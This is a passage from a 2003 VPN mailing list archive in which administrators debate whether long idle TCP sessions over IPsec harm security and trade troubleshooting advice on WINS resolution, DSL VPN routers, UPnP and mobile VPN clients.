down, since a remote-control backdoor or whatever could be installed, which could later be used compromise encrypted traffic. However, if these attacks are made while the VPN is up, then devices on the other end of the VPN connection become ready and easy targets of opportunity for the attacker. (There are usually loose - if any - Firewall rules applied to a VPN connection, so remote-compromise attacks would be much easier). Now, if all devices at the endpoints of the VPN are physically secure, and properly firewalled, then you don't have to worry too much about idle tunnels being a security risk. If fact, I'd go so far as to say strong encryption is basically redundant on a VPN. Even on a VPN with lowly single-DES encryption, hacking the endpoint workstations or servers (either remotely or physically) is likely to be an easier attack than breaking the VPN encryption. Regards, -ryan- From alex at cipherica.com Wed Apr 9 16:13:40 2003 From: alex at cipherica.com (Alex Pankratov) Date: Wed, 09 Apr 2003 13:13:40 -0700 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> Message-ID: <3E947EF4.8080701@cipherica.com> Ryan Malayter wrote: > From: Alex Pankratov [mailto:alex at cipherica.com] > >>can you explain why *exactly* it's >>a "bad security" ? Especially given >>that the TCP connection in question >>is IPsec'ed in first place. > > If the tunnel is left open, and the engineer's workstation is online and > idle, the workstation becomes a vector for compromising the security of > the encrypted traffic. That's not what I asked about. The question was how keeping *TCP sessions* open reduces overall VPN security. Let me rephrase it - which attacks mountable against VPNs would have a lesser chances of succeeding if all TCP connections are short-lived ? > [bunch of unrelated to TCP question stuff snipped] From james at heague.com.au Thu Apr 10 02:19:43 2003 From: james at heague.com.au (James McNeill) Date: Thu, 10 Apr 2003 16:19:43 +1000 Subject: [VPN] Application timeouts over VPN...HELP! References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> Message-ID: <002d01c2ff29$2d39cd20$0f00a8c0@james> The more traffic that is exposed with the same key, the easier it will be to crypto-analise and discover bad random number generating patterns. For any secuerly implemented encryption protocol, this should not be a problem. In most cases you either crack the encryption or you don't. Doesn't matter how much stuff you have to decrypt. as for TCP sessions, since the keys and algorithms will all be the same between sessions, it won't have any effect on security. anyone capable of attacking your VPN tunnel won't care what you do with your TCP sessions. as far as your attacker is concerend, a TCP session is just a number in the header, but so long as it uses the same tunnel, he won't care. It's the contents of the packet that is valuable. having abnormally long/short TCP sessions is bad practice, and likely to cause more problems than it's worth. -James | | Ryan Malayter wrote: | > From: Alex Pankratov [mailto:alex at cipherica.com] | > | >>can you explain why *exactly* it's | >>a "bad security" ? Especially given | >>that the TCP connection in question | >>is IPsec'ed in first place. | > | > If the tunnel is left open, and the engineer's workstation is online and | > idle, the workstation becomes a vector for compromising the security of | > the encrypted traffic. | | That's not what I asked about. The question was how keeping *TCP | sessions* open reduces overall VPN security. Let me rephrase it - | which attacks mountable against VPNs would have a lesser chances of | succeeding if all TCP connections are short-lived ? | | > [bunch of unrelated to TCP question stuff snipped] | | _______________________________________________ | VPN mailing list | VPN at lists.shmoo.com | http://lists.shmoo.com/mailman/listinfo/vpn | | From safieradam at hotmail.com Thu Apr 10 07:43:50 2003 From: safieradam at hotmail.com (safieradam) Date: Thu, 10 Apr 2003 07:43:50 -0400 Subject: [VPN] Application timeouts over VPN...HELP! References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> Message-ID: Well said. This is the primary concern. In addition: 1) Complexity and Audit - A minor benefit is added complexity for decryption attacks and an audit trail to pin-point attack times. A decryption attack needs some kind of identifiable data to know that it succeeded. The session encryption is based on a symmetric key which is re-negotiated per SA policy timers. Often this is as long as 8-24 hrs but can be reset to shorter periods for improved security (I like 15 minutes for connections that are not very busy, longer if traffic volume is high and renegotiation creates too much overhead). The longer the session is open with a given symmetric key the longer an attacker has to figure out the symmetric key, break into the session and hijack the TCP connection. While TCP connections can usually span multiple sessions the attacker has a limited time to launch an attack before the session key changes. If there is no data flowing on an established connection the attacker can probe the end systems with a single packet and verify s/he really broke the code and is still in the same session. Most systems don't monitor or log existing open sessions for single packets. But attackers must initiate a new connection to test the key and session lifetime if the IP connection is down. Initiating a new connection sometimes leaves a mark in logs (what is your logging and monitoring policy?) and can help alert IDS's or awake operators that something is not Kosher (why is the 2AM dump happening at 12 and is so short?) 2) Application authentication - In a well written application the end points _Should_ also re-authenticate with each TCP connection, preferably with something more secure than a plain password ( I like digital signatures). The attacker must now wait and monitor for a new session before launching an attack or might set off alarms during failed login-on attempts. (You do have a log in failure policy, right?) Even with reusable passwords the attack complexity increases - attackers have to have captured the initial log-in within the session with the broken key. 3) Session tear down - Ideally VPN implementations tear down idle low-volume sessions when the last IP connection is ended. The attacker now has to wait for another session, break the keys and try to launch an attack. Nobody likes a deadline - the length of the IP session. Sort of links to number 4 as well. Memory fades and it's been a while since I dug into the detail but I think I saw a least one vendor establish a new session for every IP connection, and close the session with the ending of the IP connection. Might have been a side effect of the testing protocol. 4) Resources - Leaving a TCP session open takes up resources in the firewall which must retain state information. (Tell the project leader to pony up an additional $100,000 for bigger firewall boxes if he must do this. At least it will improve your security budget if he falls for it.) 5) Dropped connections / QoS - Are quality of service, up time and disaster recovery security group concerns? A VPN Security Association (SA) has a session lifetime. My experience with inter-vendor VPN (as of testing 2+ years ago) is that most handle the session renegotiation OK but some drop all connections when it's time to renegotiate the SA, especially with other vendor's VPN boxes. The IP state can be lost and the IP connection of a brain dead application is henceforth blocked until a new IP session is started (by restarting the application? Ouch!). I believe this has improved with more recent releases and continued interop testing so brain dead applications can do better now. But since communication links are not stable the application better handle it (what is your quality of service agreement and will the developers pay for a 100% up time guarantee? You could have some fun with this but remember, when you apply a new firewall policy/configuration you may be droping connections). 6) Legacy security staff paranoia - In the good old days, when firewalls were just becoming available and VPN meant a multiplexed line, passwords were a main defense strategy. An open IP session was subject to hijacking without the need for the password. Security people learned to raise the specter to justify our salary. The fear persists in our psyche even with VPN. 7) Bad programming - Lack of communication session robustness and disregard for system resources makes me question the quality of the software and security awareness of the programmers. Being a former programmer, before the days of OOP, I understand the desire to get the basic code written and the avoidance of error trapping code that adds so much overhead and time to a simple and otherwise short module. But sloppy and rushed programming with a "we'll fix that later" attitude is one reason why we have so many security holes in application software. 8) I'm sure I missed something. See 6. Adam Safier ----- Original Message ----- From: "Ryan Malayter" To: Sent: Wednesday, April 09, 2003 1:36 PM Subject: RE: [VPN] Application timeouts over VPN...HELP! From: Alex Pankratov [mailto:alex at cipherica.com] >can you explain why *exactly* it's >a "bad security" ? Especially given >that the TCP connection in question >is IPsec'ed in first place. If the tunnel is left open, and the engineer's workstation is online and idle, the workstation becomes a vector for compromising the security of the encrypted traffic. If the workstation is unmanned, and the screen is accidentally left unlocked, someone could walk up and compromise the shared secret key by looking at the Ipsec cleint settings. Or someone could walk up and hack the OS (many prviliege-elevation hacks on Windows NT/2000/XP and other OS require console access), or use a debugging tool to dump the memory and find the shared secrets or session keys. These attacks could be nearly as harmful as if the tunnel was down, since a remote-control backdoor or whatever could be installed, which could later be used compromise encrypted traffic. However, if these attacks are made while the VPN is up, then devices on the other end of the VPN connection become ready and easy targets of opportunity for the attacker. (There are usually loose - if any - Firewall rules applied to a VPN connection, so remote-compromise attacks would be much easier). Now, if all devices at the endpoints of the VPN are physically secure, and properly firewalled, then you don't have to worry too much about idle tunnels being a security risk. If fact, I'd go so far as to say strong encryption is basically redundant on a VPN. Even on a VPN with lowly single-DES encryption, hacking the endpoint workstations or servers (either remotely or physically) is likely to be an easier attack than breaking the VPN encryption. Regards, -ryan- _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From lm at intrinsic.it Thu Apr 10 08:30:45 2003 From: lm at intrinsic.it (Luigi Mori) Date: Thu, 10 Apr 2003 14:30:45 +0200 Subject: [VPN] Ip addresses In-Reply-To: <003101c2feae$45a1ee40$42010180@GarryWIN2000> References: <003101c2feae$45a1ee40$42010180@GarryWIN2000> Message-ID: You can solve your problem using a route-based VPN. You can find the exact procedure on the ScreenOS 4.0 manual. Basically you have to create a tunnel interface binded to the untrust interface and assign a virtual IP address (not VIP) to the laptop. Then you have to permit the LP traffic from the unix server to the virtual address. lm From safieradam at hotmail.com Thu Apr 10 08:19:57 2003 From: safieradam at hotmail.com (safieradam) Date: Thu, 10 Apr 2003 08:19:57 -0400 Subject: [VPN] VPN help References: Message-ID: >From what I can tell they danger.com service is offering the e-mail and other data services. That means they control encryption from their server to your hiptop PDA. You will need to work with them no whether the info is encrypted over the wireless link and the security of their e-mail servers. Probably won't pass security policy muster and VPN is probably NOT your solution if you use them for more than an IP link provider. If they can simply provide a web link to your company site you might be able to put up a VPN solution but it will probably take some custom coding on the client side. I would look at more commonly available existing PDA solutions. V-one (www.v-one.com) makes a proprietary VPN and claims to have a PDA client. They may be able to modify it to work with the Hiptop device, for a price or volume deal and they are small enough to talk to and consider a new service provider as a partner. They also did work with some government groups a while back so they may already have classification levels worked out. Some government security policies forbid certain data going over the Internet even via VPN so check into that first. This is a proprietary OS (See FAQ) so you may need to work with the service vendor directly to find developers working on what you want. Adam Safier ----- Original Message ----- From: "Michael Burns" To: Sent: Tuesday, April 08, 2003 12:41 PM Subject: [VPN] VPN help > Hi, > > Am looking into to find information to see if there is VPN for the > T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason > to have the VPN is that I could use to communicate with my engineers > within the division both in and out of campus. Am deaf and am usually > working with highly senstive projects which would require me to have > secure access to my email or to corporate website. This VPN would > greatly help lot if there is a way to use in the mobile wireless pager > like the Sidekick. > > Thanks and hope there is info that would apply to this wireless pager. > Or you might know one who could help me out? Or can contact the > Danger.com group to see what would work. > > Michael Burns > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > From russak at bps.org.uk Thu Apr 10 12:23:18 2003 From: russak at bps.org.uk (Russell Sakne) Date: Thu, 10 Apr 2003 17:23:18 +0100 Subject: [VPN] Cannot find domain controller Message-ID: Hi all, I hope you can help. Having followed the advice of the very helpful people on this list, we had our remote site with its PIX-to-PIX VPN working fine, using WINS to find network resources here at home base. Then "something happened" and the remote machines can no longer find any domain controllers for our domain. They can connect to other servers (including our Terminal Serivces machine and our web proxy), but the primary machines they *need* to connect to are a PDC and a BDC and they can't see them at all. Weirdly, a "find" on the other BDC *does* get a result, which suggests they should be able to approach that machine for authentication. I've checked their DNS settings haven't changed, and "ping" tests resolve the correct IP addresses (though we've never been able to get an ICMP packet through either PIX in any circumstances...). We wondered if the machine accounts downthere had somehow managed to expire, so have deleted them from the Domain and then both attempted to created them at a workstation rename-rejoin and manually to allow the workstation to reconect as that name, to no avail. Can anyone offer any clues or informed speculation as to what might have gone wrong? We're wondering about the nature of an NT4 "Where's a DC" call. Is there some setting on the VPN that would refuse passage to such a multicast-thing which we may have inadvertently set? Hopefully yours RussellS ************************************************************************************ This email and any attachments are meant only for the person or entity intended. If you have received it in error please notify the sender and delete. Any information expressed is not necessarily the position of the Society. ************************************************************************************ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030410/ada75f48/attachment.htm From alex at cipherica.com Thu Apr 10 12:29:51 2003 From: alex at cipherica.com (Alex Pankratov) Date: Thu, 10 Apr 2003 09:29:51 -0700 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: <002d01c2ff29$2d39cd20$0f00a8c0@james> References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> <002d01c2ff29$2d39cd20$0f00a8c0@james> Message-ID: <3E959BFF.1020305@cipherica.com> James McNeill wrote: > The more traffic that is exposed with the same key, the easier it will be to > crypto-analise and discover bad random number generating patterns. For any > secuerly implemented encryption protocol, this should not be a problem. In > most cases you either crack the encryption or you don't. Doesn't matter how > much stuff you have to decrypt. > > as for TCP sessions, since the keys and algorithms will all be the same > between sessions, it won't have any effect on security. anyone capable of > attacking your VPN tunnel won't care what you do with your TCP sessions. as > far as your attacker is concerend, a TCP session is just a number in the > header, but so long as it uses the same tunnel, he won't care. It's the > contents of the packet that is valuable. Exactly my point - the length of TCP connection has no effect on the security of the VPN it's being tunneled over. I was responding to the following to the following statement .. safieradam wrote: > I would .... and point out to the developers that leaving sessions > open for hours is bad security and not allowed. .. which was given in the context of .. Mike Hancock wrote: > ..I keep saying that they need to speed up response times on their > TCP communications and send "heartbeats". They call me "Non-Helpful" .. which in term implied that 'sessions' in first quote are TCP sessions. If these were not, then there is nothing to talk about, the issue boils down to a proper use of SA lifetimes; case closed. > > having abnormally long/short TCP sessions is bad practice, and likely to > cause more problems than it's worth. > You make it sound as it's a commonly accepted fact . Well, it's not. There is nothing wrong with 'abnormally' Long/short TCP sessions. Consider SSH, IMAP, PPTP and multitude of instant messaging protocols as few examples. /alex From j.archbold at napier.ac.uk Fri Apr 11 05:27:17 2003 From: j.archbold at napier.ac.uk (James Archbold) Date: Fri, 11 Apr 2003 10:27:17 +0100 Subject: [VPN] Unable to see windows domain information (WINS) using VPN Message-ID: <3E968A75.2B51E5E3@napier.ac.uk> I cannot get any WINS resolution through my Cisco VPN 3000 Concentrator. I connect to my ISP then to the VPN 3000. I can successfully establish a tunnel and can resolve names using DNS but I cannot resolve any NetBIOS names from my WINS servers. The VPN box is connected to the DMZ of a PIX firewall. I can ping the WINS servers and all IP routing is working. I am using the Cisco VPN Client 3.6.3a. Below is a ipconfig /all before and after the VPN connection is established. My IP address through the VPN is allocated from an IP pool on a RADIUS server and my WINS configuration is also set-up from the RADIUS server. (RADIUS server is Cisco ACS 3.1) Before VPN connection Windows IP Configuration Host Name . . . . . . . . . . . . : host Primary Dns Suffix . . . . . . . : domain.napier.ac.uk Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : Yes WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : napier.ac.uk PPP adapter ISP: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-XX-XX-XX-XX-XX Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 80.225.182.70 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 80.225.182.70 DNS Servers . . . . . . . . . . . : 80.225.251.50 80.225.252.58 NetBIOS over Tcpip. . . . . . . . : Disabled After connection to VPN Windows IP Configuration Host Name . . . . . . . . . . . . : host Primary Dns Suffix . . . . . . . : domain.napier.ac.uk Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : Yes WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : napier.ac.uk napier.ac.uk PPP adapter ISP: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-53-45-00-00-00 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 80.225.182.70 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 80.225.182.70 DNS Servers . . . . . . . . . . . : 146.176.1.5 146.176.2.5 Primary WINS Server . . . . . . . : 146.176.a.xxx Secondary WINS Server . . . . . . : 146.176.b.yyy NetBIOS over Tcpip. . . . . . . . : Disabled Any ideas? From seth.robinson at maine.edu Fri Apr 11 14:14:32 2003 From: seth.robinson at maine.edu (Seth Robinson) Date: Fri, 11 Apr 2003 14:14:32 -0400 Subject: [VPN] UPnP over Sonicwall VPN Message-ID: Hey Guys, I was having a Messenger problem a while back, and was told to open up some ports, and to also allow SIP through my firewall (SonicWALL). I did this, and it still didn't work. I did a little more research and found out quite a bit of interesting info. First off, we were trying to do A/V conferencing through windows messenger. We were using WM 4.6, but then upgraded to WM 4.7. We have our own IM server. Apparently 4.7 is the first version to make use of UPnP, universal plug and play. Basically what this does is dynamically assigns UDP ports 5004 to 65535 for everything from A/V conversations to white board sharing, There by allowing it to connect without having to worry about what ports are already in use. Herein lays the problem. SonicWALL is not UPnP compatible. It does not recognize what messenger is trying to do, and doesn't know what ports are trying to be used and instead blocks it. My question is, since it is possible to get UPnP compatible routers, would it possibly work to set one up behind the SonicWALL, have all nodes on that LAN use it as their gateway, and then set the router's gateway to be the SonicWALL, do the same thing for the other side of the VPN, and then open up all ports between those two IP addresses, and leave everything else closed. Sorry to be so long-winded, but please tell me what your thoughts are... Thanks a ton, Seth R. From jperry at cccil.org Fri Apr 11 16:56:49 2003 From: jperry at cccil.org (Jill Perry) Date: Fri, 11 Apr 2003 13:56:49 -0700 Subject: [VPN] Which DSL router? Message-ID: <001101c3006c$df8eede0$6901a8c0@CCCIL> Our office wants to implement VPN in the near future. We have 2 offices with a server and DSL router in each, and several satellite offices with one computer with a dial-up connection. I've researched DSL routers with VPN firewall, and have a list of models that I think, from what I've read, will meet our needs. All offer stateful packet inspection and 3DES, multiple simultaneous VPN tunnels, and are fairly inexpensive. What I don't know is how easy the installation is, what changes may be needed in our current network setups, if any other software is needed (all computers are on Win2000), and are there other things we should be thinking about? Here are the models: NetGear FVS318 Linksys BEFVP41 D-Link DI-804V Barricade Plus SMC7004FW ZyXEL Prestige 652 Can any of you give us information that will help us decide which would work best for us? Have any of you used one of these successfully in a similar situation? Thanks for your help. Jill -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030411/0a4dc3c2/attachment.htm From tbird at precision-guesswork.com Fri Apr 11 17:29:17 2003 From: tbird at precision-guesswork.com (Tina Bird) Date: Fri, 11 Apr 2003 21:29:17 +0000 (GMT) Subject: [VPN] WINS/browsing etc. Message-ID: <20030411212807.W72889-100000@sisyphus.iocaine.com> Hi all -- You'll have noticed we've had several "help can't see shares" messages today. If someone would please do me the favor of writing the definitive answer to these questions, I will gleefully put it on the VPN site so we don't have to keep repeating it -- I'd do it myself but I'm up to my earlobes in doc for work. thanks much -- tbird -- don't worry please please how many times do I have to say it there's no way not to be who you are and where -- Ikkyu http://www.shmoo.com/~tbird Log Analysis http://www.loganalysis.org VPN http://vpn.shmoo.com From djdawso at qwest.com Fri Apr 11 18:45:42 2003 From: djdawso at qwest.com (Dana J. Dawson) Date: Fri, 11 Apr 2003 17:45:42 -0500 Subject: [VPN] Application timeouts over VPN...HELP! References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> <002d01c2ff29$2d39cd20$0f00a8c0@james> <3E959BFF.1020305@cipherica.com> Message-ID: <3E974596.8040500@qwest.com> > You make it sound as it's a commonly accepted fact . Well, it's not. > There is nothing wrong with 'abnormally' Long/short TCP sessions. > Consider SSH, IMAP, PPTP and multitude of instant messaging protocols > as few examples. There may be nothing wrong with "abnormally long" TCP sessions from a TCP or a security standpoint (I'm ignoring the concept of an "abnormally short" TCP session, since I don't believe such a thing exists), but when devices that track the states of those sessions are involved, such as firewalls, then there are very real issues that could be considered problems. Such devices have to allocate resources for each connection, so they must impose an idle timeout of some sort or risk eventual failure due to lack of resources. The fact that firewalls are as common as they are today implies to me that it is now, indeed, bad practice for a developer to assume that a TCP session can be left idle for an arbitrary length of time. Similarly, I think it's also bad practice for a firewall administrator to impose an excessively short timeout period for idle sessions. What are reasonable times? That's obviously open to individual opinion, but more extreme time periods will elicit more universal agreement. For example, I doubt anyone would think a one year idle timeout is reasonable, nor that a ten second timeout is reasonable. The most common timeouts I encounter are in the range of half an hour up to a small number of hours (usually less than 8). Within that range there is still room for much debate. I believe the original post in this topic referred to a 65 second timeout, which I think is unreasonably short. However, I also think that it's not reasonable to assume that an idle TCP session should always survive for several (perhaps even just a few) hours, and that developers should avoid such situations by either closing a connection when it's not "immediately" needed (whatever that means), by using a keepalive and/or recovery mechanism, or by using a connectionless protocol such as UDP. Dana -- Dana J. Dawson djdawso at qwest.com Senior Staff Engineer CCIE #1937 Qwest Communications (612) 664-3364 600 Stinson Blvd., Suite 1S (612) 664-4779 (FAX) Minneapolis MN 55413-2620 "Hard is where the money is." From osmond at holburn.com Fri Apr 11 22:44:49 2003 From: osmond at holburn.com (Chad Osmond) Date: Fri, 11 Apr 2003 22:44:49 -0400 Subject: [VPN] Which DSL router? References: <001101c3006c$df8eede0$6901a8c0@CCCIL> Message-ID: <004301c3009d$7e2dc4a0$1902a8c0@Polk> >Linksys BEFVP41 >D-Link DI-804V Tried both, both are sitting in a pile on my desk. I'm a Netscreen fan, after countless hours wasted on cheaper products I went with the Netscreen 5's If you save $400 on hardware costs you're going to loose it in setup, I spent countless hours configuring, testing, finding bugs, and calling tech support, it's just not worth it. Check E-bay for a 5XP (Or order new) and add a 10 pack of Netscreen remote. Take my advice for what it is, if you need a solution that is easy, compatible, works and is secure spend the $$ on Netscreen. Just a though, Chad ----- Original Message ----- From: Jill Perry To: vpn at lists.shmoo.com Sent: Friday, April 11, 2003 4:56 PM Subject: [VPN] Which DSL router? Our office wants to implement VPN in the near future. We have 2 offices with a server and DSL router in each, and several satellite offices with one computer with a dial-up connection. I've researched DSL routers with VPN firewall, and have a list of models that I think, from what I've read, will meet our needs. All offer stateful packet inspection and 3DES, multiple simultaneous VPN tunnels, and are fairly inexpensive. What I don't know is how easy the installation is, what changes may be needed in our current network setups, if any other software is needed (all computers are on Win2000), and are there other things we should be thinking about? Here are the models: NetGear FVS318 Linksys BEFVP41 D-Link DI-804V Barricade Plus SMC7004FW ZyXEL Prestige 652 Can any of you give us information that will help us decide which would work best for us? Have any of you used one of these successfully in a similar situation? Thanks for your help. Jill -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030411/d524c49b/attachment.htm From osmond at holburn.com Fri Apr 11 22:49:05 2003 From: osmond at holburn.com (Chad Osmond) Date: Fri, 11 Apr 2003 22:49:05 -0400 Subject: [VPN] Cannot find domain controller References: Message-ID: <005501c3009e$161d5640$1902a8c0@Polk> LMHosts? Give it a try, usually works wonders for me. Aside from that, I'm not sure what to suggest, If you're on 2K/XP machines you can attempt to browse the shares by IP address, rule out any of the naming gremlins. eg. \\192.168.12.2\data HTH Chad ----- Original Message ----- From: Russell Sakne To: vpn at lists.shmoo.com Sent: Thursday, April 10, 2003 12:23 PM Subject: [VPN] Cannot find domain controller Hi all, I hope you can help. Having followed the advice of the very helpful people on this list, we had our remote site with its PIX-to-PIX VPN working fine, using WINS to find network resources here at home base. Then "something happened" and the remote machines can no longer find any domain controllers for our domain. They can connect to other servers (including our Terminal Serivces machine and our web proxy), but the primary machines they *need* to connect to are a PDC and a BDC and they can't see them at all. Weirdly, a "find" on the other BDC *does* get a result, which suggests they should be able to approach that machine for authentication. I've checked their DNS settings haven't changed, and "ping" tests resolve the correct IP addresses (though we've never been able to get an ICMP packet through either PIX in any circumstances...). We wondered if the machine accounts downthere had somehow managed to expire, so have deleted them from the Domain and then both attempted to created them at a workstation rename-rejoin and manually to allow the workstation to reconect as that name, to no avail. Can anyone offer any clues or informed speculation as to what might have gone wrong? We're wondering about the nature of an NT4 "Where's a DC" call. Is there some setting on the VPN that would refuse passage to such a multicast-thing which we may have inadvertently set? Hopefully yours RussellS ************************************************************************************ This email and any attachments are meant only for the person or entity intended. If you have received it in error please notify the sender and delete. Any information expressed is not necessarily the position of the Society. ************************************************************************************ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030411/b92b90f5/attachment.htm From dr_t1mel0rd at hotmail.com Fri Apr 11 23:00:01 2003 From: dr_t1mel0rd at hotmail.com (Dr T1meL0rD) Date: Fri, 11 Apr 2003 23:00:01 -0400 Subject: [VPN] Application timeouts over VPN...HELP! Message-ID: Please define "abnormally long"... Yes, backups over a network connection, some SSH sessions (for SAs, DBAs, etc.), database instance backups, etc, usually require "longer than normal" timeouts, sometimes several hours in the case of backups. HOWEVER, these connections should be the extreme exception, rather than the rule. Situations like this have resulted in verbal sparring with some of my clientele and their administrative staff, but I NEVER allow it to compromise the security of a system that they are paying me good money to protect. I have walked out of meetings because some requests were so over-the-top. Typically, I will run a TCP connection up to 5 minutes, and it seems to work well, except in some of the occasions I mentioned above. Getting to know your customer's system is key. Cutting through the BS is usually a tougher nut, but is essential in trying to determine what _is_ necessary. Using UDP to circumvent the state issue will create more work for the developers in that more error-checking and -handling code is necessary. I definitely agree with Dana in that developers need to be a bit more judicious with the amount of time they allow connections to remain open. The less security savvy (usually the ones who roll their eyes and begin complaining when they hear a firewall is going to be implemented) typically are sloppier about maintaining state in the application, which is usually a prime reason _the_firewall_ is blamed for "breaking their application." IT managers with sufficient clue will suspect this to be the case. BTW, however heavily I may use it in brief contact with individuals on a professional basis, I have never seen instant messaging as a requirement for a long time-out through a firewall on a production system. If you are putting a firewall only at the border with these requirements, I would certainly recommend defense-in-depth... _________________________________________________________________ The new MSN 8: advanced junk mail protection and 2 months FREE* http://join.msn.com/?page=features/junkmail From alex at cipherica.com Sun Apr 13 04:14:31 2003 From: alex at cipherica.com (Alex Pankratov) Date: Sun, 13 Apr 2003 01:14:31 -0700 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: <3E974596.8040500@qwest.com> References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> <002d01c2ff29$2d39cd20$0f00a8c0@james> <3E959BFF.1020305@cipherica.com> <3E974596.8040500@qwest.com> Message-ID: <3E991C67.2090503@cipherica.com> Dana J. Dawson wrote: > > You make it sound as it's a commonly accepted fact . Well, it's not. > > There is nothing wrong with 'abnormally' Long/short TCP sessions. > > Consider SSH, IMAP, PPTP and multitude of instant messaging protocols > > as few examples. > > There may be nothing wrong with "abnormally long" TCP sessions from a > TCP or a security standpoint (I'm ignoring the concept of an "abnormally > short" TCP session, since I don't believe such a thing exists), but when > devices that track the states of those sessions are involved, such as > firewalls, then there are very real issues that could be considered > problems. Such devices have to allocate resources for each connection, > so they must impose an idle timeout of some sort or risk eventual > failure due to lack of resources. Not really. Timing out idle connections is neither neccessary nor sufficient to resolve and/or prevent resource exhaustion. If the firewall does encounter the lack of resources it'd be more reasonable to drop least recently active connection, but timing it out 'preventively' serves no clear purpose. Idle TCP timeouts is more as a functional feature rather than an implementation caveat. From hakan.palm at generic.se Sun Apr 13 08:44:00 2003 From: hakan.palm at generic.se (hakan.palm at generic.se) Date: Sun, 13 Apr 2003 14:44:00 +0200 Subject: Ang: Re: [VPN] VPN help Message-ID: Ceritcom's movianVPN client, www.certicom.com/products/movian/movianvpn.html, can be used to connect to e.g. Cisco VPN 3000 and runs on PalmOS, Pocket PC and Symbian. They also have a FIPS-140-2 compliant client for PalmOS and Pocket PC. Might be worth looking at... HTH, /Palm safieradam at hotmail.com 2003-04-11 23:19 Till: aquamjb at mac.com @ INTERNET, vpn at lists.shmoo.com @ INTERNET Kopia: (Blank: Hakan Palm/Generic) ?rende: Re: [VPN] VPN help >From what I can tell they danger.com service is offering the e-mail and other data services. That means they control encryption from their server to your hiptop PDA. You will need to work with them no whether the info is encrypted over the wireless link and the security of their e-mail servers. Probably won't pass security policy muster and VPN is probably NOT your solution if you use them for more than an IP link provider. If they can simply provide a web link to your company site you might be able to put up a VPN solution but it will probably take some custom coding on the client side. I would look at more commonly available existing PDA solutions. V-one (www.v-one.com) makes a proprietary VPN and claims to have a PDA client. They may be able to modify it to work with the Hiptop device, for a price or volume deal and they are small enough to talk to and consider a new service provider as a partner. They also did work with some government groups a while back so they may already have classification levels worked out. Some government security policies forbid certain data going over the Internet even via VPN so check into that first. This is a proprietary OS (See FAQ) so you may need to work with the service vendor directly to find developers working on what you want. Adam Safier ----- Original Message ----- From: "Michael Burns" To: Sent: Tuesday, April 08, 2003 12:41 PM Subject: [VPN] VPN help > Hi, > > Am looking into to find information to see if there is VPN for the > T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason > to have the VPN is that I could use to communicate with my engineers > within the division both in and out of campus. Am deaf and am usually > working with highly senstive projects which would require me to have > secure access to my email or to corporate website. This VPN would > greatly help lot if there is a way to use in the mobile wireless pager > like the Sidekick. > > Thanks and hope there is info that would apply to this wireless pager. > Or you might know one who could help me out? Or can contact the > Danger.com group to see what would work. > > Michael Burns > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From jim.atherton at netifice.com Tue Apr 15 11:58:01 2003 From: jim.atherton at netifice.com (Jim Atherton) Date: Tue, 15 Apr 2003 08:58:01 -0700 Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Message-ID: I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco VPN 3000 hardware client. I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002. Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Richocet crashed we did some stuff with them. But since then we have had no wireless mobile solution. If there are any other cost effective mobile wireless solutions out there I would like to know. Personally, I need connectivity via my laptop and a can accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, more expensive solutions are not currently acceptable. I cannot for instance use some sort of high speed satellite connection due to cost. Thanks for any info. From hakan.palm at generic.se Tue Apr 15 17:08:21 2003 From: hakan.palm at generic.se (hakan.palm at generic.se) Date: Tue, 15 Apr 2003 23:08:21 +0200 Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Message-ID: Jim, are you trying to connect to a Cisco VPN 3002 Hardware 